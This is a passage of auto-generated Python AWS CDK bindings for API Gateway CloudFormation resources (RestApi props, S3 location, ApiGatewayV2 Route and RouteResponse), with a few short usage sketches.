"""
self._values = {
}
if bucket is not None: self._values["bucket"] = bucket
if e_tag is not None: self._values["e_tag"] = e_tag
if key is not None: self._values["key"] = key
if version is not None: self._values["version"] = version
@property
def bucket(self) -> typing.Optional[str]:
"""``CfnRestApi.S3LocationProperty.Bucket``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html#cfn-apigateway-restapi-s3location-bucket
"""
return self._values.get('bucket')
@property
def e_tag(self) -> typing.Optional[str]:
"""``CfnRestApi.S3LocationProperty.ETag``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html#cfn-apigateway-restapi-s3location-etag
"""
return self._values.get('e_tag')
@property
def key(self) -> typing.Optional[str]:
"""``CfnRestApi.S3LocationProperty.Key``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html#cfn-apigateway-restapi-s3location-key
"""
return self._values.get('key')
@property
def version(self) -> typing.Optional[str]:
"""``CfnRestApi.S3LocationProperty.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-restapi-s3location.html#cfn-apigateway-restapi-s3location-version
"""
return self._values.get('version')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'S3LocationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
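# Illustrative sketch (hypothetical bucket, key and version id): pinning the
# API definition to a specific S3 object version.
#
#   CfnRestApi.S3LocationProperty(
#       bucket="my-bucket",
#       key="openapi.yaml",
#       version="obj-version-id",
#   )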
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRestApiProps", jsii_struct_bases=[], name_mapping={'api_key_source_type': 'apiKeySourceType', 'binary_media_types': 'binaryMediaTypes', 'body': 'body', 'body_s3_location': 'bodyS3Location', 'clone_from': 'cloneFrom', 'description': 'description', 'endpoint_configuration': 'endpointConfiguration', 'fail_on_warnings': 'failOnWarnings', 'minimum_compression_size': 'minimumCompressionSize', 'name': 'name', 'parameters': 'parameters', 'policy': 'policy', 'tags': 'tags'})
class CfnRestApiProps():
def __init__(self, *, api_key_source_type: typing.Optional[str]=None, binary_media_types: typing.Optional[typing.List[str]]=None, body: typing.Any=None, body_s3_location: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnRestApi.S3LocationProperty"]]]=None, clone_from: typing.Optional[str]=None, description: typing.Optional[str]=None, endpoint_configuration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnRestApi.EndpointConfigurationProperty"]]]=None, fail_on_warnings: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, name: typing.Optional[str]=None, parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, policy: typing.Any=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None):
"""Properties for defining a ``AWS::ApiGateway::RestApi``.
:param api_key_source_type: ``AWS::ApiGateway::RestApi.ApiKeySourceType``.
:param binary_media_types: ``AWS::ApiGateway::RestApi.BinaryMediaTypes``.
:param body: ``AWS::ApiGateway::RestApi.Body``.
:param body_s3_location: ``AWS::ApiGateway::RestApi.BodyS3Location``.
:param clone_from: ``AWS::ApiGateway::RestApi.CloneFrom``.
:param description: ``AWS::ApiGateway::RestApi.Description``.
:param endpoint_configuration: ``AWS::ApiGateway::RestApi.EndpointConfiguration``.
:param fail_on_warnings: ``AWS::ApiGateway::RestApi.FailOnWarnings``.
:param minimum_compression_size: ``AWS::ApiGateway::RestApi.MinimumCompressionSize``.
:param name: ``AWS::ApiGateway::RestApi.Name``.
:param parameters: ``AWS::ApiGateway::RestApi.Parameters``.
:param policy: ``AWS::ApiGateway::RestApi.Policy``.
:param tags: ``AWS::ApiGateway::RestApi.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html
"""
self._values = {
}
if api_key_source_type is not None: self._values["api_key_source_type"] = api_key_source_type
if binary_media_types is not None: self._values["binary_media_types"] = binary_media_types
if body is not None: self._values["body"] = body
if body_s3_location is not None: self._values["body_s3_location"] = body_s3_location
if clone_from is not None: self._values["clone_from"] = clone_from
if description is not None: self._values["description"] = description
if endpoint_configuration is not None: self._values["endpoint_configuration"] = endpoint_configuration
if fail_on_warnings is not None: self._values["fail_on_warnings"] = fail_on_warnings
if minimum_compression_size is not None: self._values["minimum_compression_size"] = minimum_compression_size
if name is not None: self._values["name"] = name
if parameters is not None: self._values["parameters"] = parameters
if policy is not None: self._values["policy"] = policy
if tags is not None: self._values["tags"] = tags
@property
def api_key_source_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.ApiKeySourceType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-apikeysourcetype
"""
return self._values.get('api_key_source_type')
@property
def binary_media_types(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::RestApi.BinaryMediaTypes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-binarymediatypes
"""
return self._values.get('binary_media_types')
@property
def body(self) -> typing.Any:
"""``AWS::ApiGateway::RestApi.Body``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-body
"""
return self._values.get('body')
@property
def body_s3_location(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnRestApi.S3LocationProperty"]]]:
"""``AWS::ApiGateway::RestApi.BodyS3Location``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-bodys3location
"""
return self._values.get('body_s3_location')
@property
def clone_from(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.CloneFrom``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-clonefrom
"""
return self._values.get('clone_from')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-description
"""
return self._values.get('description')
@property
def endpoint_configuration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnRestApi.EndpointConfigurationProperty"]]]:
"""``AWS::ApiGateway::RestApi.EndpointConfiguration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-endpointconfiguration
"""
return self._values.get('endpoint_configuration')
@property
def fail_on_warnings(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::RestApi.FailOnWarnings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-failonwarnings
"""
return self._values.get('fail_on_warnings')
@property
def minimum_compression_size(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGateway::RestApi.MinimumCompressionSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-minimumcompressionsize
"""
return self._values.get('minimum_compression_size')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::RestApi.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-name
"""
return self._values.get('name')
@property
def parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::RestApi.Parameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-parameters
"""
return self._values.get('parameters')
@property
def policy(self) -> typing.Any:
"""``AWS::ApiGateway::RestApi.Policy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-policy
"""
return self._values.get('policy')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::RestApi.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-restapi.html#cfn-apigateway-restapi-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnRestApiProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
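# Usage sketch: ``CfnRestApiProps`` accepts only keyword arguments and every
# one of them is optional. The names and sizes below are hypothetical; the
# ``body_s3_location`` value reuses the sketch shown after ``S3LocationProperty``.
def _example_rest_api_props() -> CfnRestApiProps:
    return CfnRestApiProps(
        name="books-api",                # hypothetical API name
        description="Example REST API",
        binary_media_types=["image/png"],
        minimum_compression_size=1024,   # compress responses of 1 KiB or more
        fail_on_warnings=True,
        body_s3_location=_example_s3_location(),
    )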
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRouteResponseV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnRouteResponseV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::RouteResponse``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::RouteResponse
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, route_id: str, route_response_key: str, model_selection_expression: typing.Optional[str]=None, response_models: typing.Any=None, response_parameters: typing.Any=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::RouteResponse``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param api_id: ``AWS::ApiGatewayV2::RouteResponse.ApiId``.
:param route_id: ``AWS::ApiGatewayV2::RouteResponse.RouteId``.
:param route_response_key: ``AWS::ApiGatewayV2::RouteResponse.RouteResponseKey``.
:param model_selection_expression: ``AWS::ApiGatewayV2::RouteResponse.ModelSelectionExpression``.
:param response_models: ``AWS::ApiGatewayV2::RouteResponse.ResponseModels``.
:param response_parameters: ``AWS::ApiGatewayV2::RouteResponse.ResponseParameters``.
"""
props = CfnRouteResponseV2Props(api_id=api_id, route_id=route_id, route_response_key=route_response_key, model_selection_expression=model_selection_expression, response_models=response_models, response_parameters=response_parameters)
jsii.create(CfnRouteResponseV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="responseModels")
def response_models(self) -> typing.Any:
"""``AWS::ApiGatewayV2::RouteResponse.ResponseModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-responsemodels
"""
return jsii.get(self, "responseModels")
@response_models.setter
def response_models(self, value: typing.Any):
return jsii.set(self, "responseModels", value)
@property
@jsii.member(jsii_name="responseParameters")
def response_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::RouteResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-responseparameters
"""
return jsii.get(self, "responseParameters")
@response_parameters.setter
def response_parameters(self, value: typing.Any):
return jsii.set(self, "responseParameters", value)
@property
@jsii.member(jsii_name="routeId")
def route_id(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.RouteId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-routeid
"""
return jsii.get(self, "routeId")
@route_id.setter
def route_id(self, value: str):
return jsii.set(self, "routeId", value)
@property
@jsii.member(jsii_name="routeResponseKey")
def route_response_key(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.RouteResponseKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-routeresponsekey
"""
return jsii.get(self, "routeResponseKey")
@route_response_key.setter
def route_response_key(self, value: str):
return jsii.set(self, "routeResponseKey", value)
@property
@jsii.member(jsii_name="modelSelectionExpression")
def model_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::RouteResponse.ModelSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-modelselectionexpression
"""
return jsii.get(self, "modelSelectionExpression")
@model_selection_expression.setter
def model_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "modelSelectionExpression", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRouteResponseV2.ParameterConstraintsProperty", jsii_struct_bases=[], name_mapping={'required': 'required'})
class ParameterConstraintsProperty():
def __init__(self, *, required: typing.Union[bool, aws_cdk.core.IResolvable]):
"""
:param required: ``CfnRouteResponseV2.ParameterConstraintsProperty.Required``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-routeresponse-parameterconstraints.html
"""
self._values = {
'required': required,
}
@property
def required(self) -> typing.Union[bool, aws_cdk.core.IResolvable]:
"""``CfnRouteResponseV2.ParameterConstraintsProperty.Required``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-routeresponse-parameterconstraints.html#cfn-apigatewayv2-routeresponse-parameterconstraints-required
"""
return self._values.get('required')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'ParameterConstraintsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
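# Usage sketch for ``CfnRouteResponseV2``: the construct needs a scope (an
# ``aws_cdk.core.Stack`` supplied by the caller) plus the three required
# identifiers. The ``$default`` route response key is the standard catch-all.
def _example_route_response(stack: aws_cdk.core.Stack, api_id: str, route_id: str) -> CfnRouteResponseV2:
    return CfnRouteResponseV2(
        stack, "RouteResponse",
        api_id=api_id,
        route_id=route_id,
        route_response_key="$default",
    )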
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRouteResponseV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'route_id': 'routeId', 'route_response_key': 'routeResponseKey', 'model_selection_expression': 'modelSelectionExpression', 'response_models': 'responseModels', 'response_parameters': 'responseParameters'})
class CfnRouteResponseV2Props():
def __init__(self, *, api_id: str, route_id: str, route_response_key: str, model_selection_expression: typing.Optional[str]=None, response_models: typing.Any=None, response_parameters: typing.Any=None):
"""Properties for defining a ``AWS::ApiGatewayV2::RouteResponse``.
:param api_id: ``AWS::ApiGatewayV2::RouteResponse.ApiId``.
:param route_id: ``AWS::ApiGatewayV2::RouteResponse.RouteId``.
:param route_response_key: ``AWS::ApiGatewayV2::RouteResponse.RouteResponseKey``.
:param model_selection_expression: ``AWS::ApiGatewayV2::RouteResponse.ModelSelectionExpression``.
:param response_models: ``AWS::ApiGatewayV2::RouteResponse.ResponseModels``.
:param response_parameters: ``AWS::ApiGatewayV2::RouteResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html
"""
self._values = {
'api_id': api_id,
'route_id': route_id,
'route_response_key': route_response_key,
}
if model_selection_expression is not None: self._values["model_selection_expression"] = model_selection_expression
if response_models is not None: self._values["response_models"] = response_models
if response_parameters is not None: self._values["response_parameters"] = response_parameters
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-apiid
"""
return self._values.get('api_id')
@property
def route_id(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.RouteId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-routeid
"""
return self._values.get('route_id')
@property
def route_response_key(self) -> str:
"""``AWS::ApiGatewayV2::RouteResponse.RouteResponseKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-routeresponsekey
"""
return self._values.get('route_response_key')
@property
def model_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::RouteResponse.ModelSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-modelselectionexpression
"""
return self._values.get('model_selection_expression')
@property
def response_models(self) -> typing.Any:
"""``AWS::ApiGatewayV2::RouteResponse.ResponseModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-responsemodels
"""
return self._values.get('response_models')
@property
def response_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::RouteResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-routeresponse.html#cfn-apigatewayv2-routeresponse-responseparameters
"""
return self._values.get('response_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnRouteResponseV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
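# Usage sketch: the same values expressed as a ``CfnRouteResponseV2Props``
# struct. The ``Empty`` model name is hypothetical and would have to match a
# model defined on the API.
def _example_route_response_props(api_id: str, route_id: str) -> CfnRouteResponseV2Props:
    return CfnRouteResponseV2Props(
        api_id=api_id,
        route_id=route_id,
        route_response_key="$default",
        response_models={"application/json": "Empty"},  # hypothetical model name
    )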
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRouteV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnRouteV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Route``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Route
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, route_key: str, api_key_required: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, authorization_scopes: typing.Optional[typing.List[str]]=None, authorization_type: typing.Optional[str]=None, authorizer_id: typing.Optional[str]=None, model_selection_expression: typing.Optional[str]=None, operation_name: typing.Optional[str]=None, request_models: typing.Any=None, request_parameters: typing.Any=None, route_response_selection_expression: typing.Optional[str]=None, target: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Route``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param api_id: ``AWS::ApiGatewayV2::Route.ApiId``.
:param route_key: ``AWS::ApiGatewayV2::Route.RouteKey``.
:param api_key_required: ``AWS::ApiGatewayV2::Route.ApiKeyRequired``.
:param authorization_scopes: ``AWS::ApiGatewayV2::Route.AuthorizationScopes``.
:param authorization_type: ``AWS::ApiGatewayV2::Route.AuthorizationType``.
:param authorizer_id: ``AWS::ApiGatewayV2::Route.AuthorizerId``.
:param model_selection_expression: ``AWS::ApiGatewayV2::Route.ModelSelectionExpression``.
:param operation_name: ``AWS::ApiGatewayV2::Route.OperationName``.
:param request_models: ``AWS::ApiGatewayV2::Route.RequestModels``.
:param request_parameters: ``AWS::ApiGatewayV2::Route.RequestParameters``.
:param route_response_selection_expression: ``AWS::ApiGatewayV2::Route.RouteResponseSelectionExpression``.
:param target: ``AWS::ApiGatewayV2::Route.Target``.
"""
props = CfnRouteV2Props(api_id=api_id, route_key=route_key, api_key_required=api_key_required, authorization_scopes=authorization_scopes, authorization_type=authorization_type, authorizer_id=authorizer_id, model_selection_expression=model_selection_expression, operation_name=operation_name, request_models=request_models, request_parameters=request_parameters, route_response_selection_expression=route_response_selection_expression, target=target)
jsii.create(CfnRouteV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Route.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="requestModels")
def request_models(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Route.RequestModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-requestmodels
"""
return jsii.get(self, "requestModels")
@request_models.setter
def request_models(self, value: typing.Any):
return jsii.set(self, "requestModels", value)
@property
@jsii.member(jsii_name="requestParameters")
def request_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Route.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-requestparameters
"""
return jsii.get(self, "requestParameters")
@request_parameters.setter
def request_parameters(self, value: typing.Any):
return jsii.set(self, "requestParameters", value)
@property
@jsii.member(jsii_name="routeKey")
def route_key(self) -> str:
"""``AWS::ApiGatewayV2::Route.RouteKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-routekey
"""
return jsii.get(self, "routeKey")
@route_key.setter
def route_key(self, value: str):
return jsii.set(self, "routeKey", value)
@property
@jsii.member(jsii_name="apiKeyRequired")
def api_key_required(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGatewayV2::Route.ApiKeyRequired``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-apikeyrequired
"""
return jsii.get(self, "apiKeyRequired")
@api_key_required.setter
def api_key_required(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "apiKeyRequired", value)
@property
@jsii.member(jsii_name="authorizationScopes")
def authorization_scopes(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGatewayV2::Route.AuthorizationScopes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizationscopes
"""
return jsii.get(self, "authorizationScopes")
@authorization_scopes.setter
def authorization_scopes(self, value: typing.Optional[typing.List[str]]):
return jsii.set(self, "authorizationScopes", value)
@property
@jsii.member(jsii_name="authorizationType")
def authorization_type(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.AuthorizationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizationtype
"""
return jsii.get(self, "authorizationType")
@authorization_type.setter
def authorization_type(self, value: typing.Optional[str]):
return jsii.set(self, "authorizationType", value)
@property
@jsii.member(jsii_name="authorizerId")
def authorizer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.AuthorizerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-authorizerid
"""
return jsii.get(self, "authorizerId")
@authorizer_id.setter
def authorizer_id(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerId", value)
@property
@jsii.member(jsii_name="modelSelectionExpression")
def model_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.ModelSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-modelselectionexpression
"""
return jsii.get(self, "modelSelectionExpression")
@model_selection_expression.setter
def model_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "modelSelectionExpression", value)
@property
@jsii.member(jsii_name="operationName")
def operation_name(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.OperationName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-operationname
"""
return jsii.get(self, "operationName")
@operation_name.setter
def operation_name(self, value: typing.Optional[str]):
return jsii.set(self, "operationName", value)
@property
@jsii.member(jsii_name="routeResponseSelectionExpression")
def route_response_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.RouteResponseSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-routeresponseselectionexpression
"""
return jsii.get(self, "routeResponseSelectionExpression")
@route_response_selection_expression.setter
def route_response_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "routeResponseSelectionExpression", value)
@property
@jsii.member(jsii_name="target")
def target(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Route.Target``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-route.html#cfn-apigatewayv2-route-target
"""
return jsii.get(self, "target")
@target.setter
def target(self, value: typing.Optional[str]):
return jsii.set(self, "target", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnRouteV2.ParameterConstraintsProperty", jsii_struct_bases=[], name_mapping={'required': 'required'})
class ParameterConstraintsProperty():
def __init__(self, *, required: typing.Union[bool, aws_cdk.core.IResolvable]):
"""
:param required: ``CfnRouteV2.ParameterConstraintsProperty.Required``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-route-parameterconstraints.html
"""
self._values = {
'required': required,
}
@property
def required(self) -> typing.Union[bool, aws_cdk.core.IResolvable]:
"""``CfnRouteV2.ParameterConstraintsProperty.Required``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-route-parameterconstraints.html#cfn-apigatewayv2-route-parameterconstraints-required
"""
return self._values.get('required')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
